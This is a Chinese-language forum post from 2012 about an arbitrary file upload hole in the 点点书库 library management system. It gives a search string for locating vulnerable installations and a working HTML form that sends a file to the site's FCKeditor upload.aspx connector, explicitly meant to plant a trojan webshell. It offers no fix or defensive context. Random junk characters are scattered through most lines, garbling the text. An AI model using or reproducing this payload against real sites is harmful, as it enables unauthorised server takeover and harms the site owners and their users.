主题:图书馆系统任意文件上传漏洞
@6 {5 ~ O' ]7 g3 S1 g 作者:冰锋刺客
' B3 G8 ]* r+ q( ~ T' ]& z 厂商:点击书(dianjishu.com)
, c; e6 J* @& d* D. k! ~ 日期:2012-6-21- u$ ?/ [3 b* O; l
7 J9 l; \% b* B% L% [+ S/ yI 概述2 }* d, Z9 s. V1 H7 [
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
3 @! N3 C0 G0 A- k II 简介
% L2 y6 H9 S4 Z7 Q' o( M 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
: O8 i0 O) k3 B7 ~( s! F0 F 补充一个漏洞0 U, \ ]/ ~) n7 _ r- L2 @/ p
<form id="frmUpload" enctype="multipart/form-data". y6 t {& s; p( h7 G- K$ \
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
& w9 c' [( F/ \6 {: ` i/ @5 u. I% T <input id="btnUpload" type="submit" value="操翻他">
0 |5 ]4 i4 n V6 @' ^4 m </form>' P/ e- Z, _- s: O+ D+ r7 Q1 H& n& C
你们懂的
. F |% [/ g8 b. |, @0 a& v 那傻逼提供还需要改包.
- t8 M: M. q6 {: G, B8 h 自己看了下源代码发现fckeditor; L5 H0 w( \0 o2 k: ?- V
直接秒杀5 B N. o. H1 h, _
|
发表于 2012-9-10 21:20:59
收藏
分享
支持
反对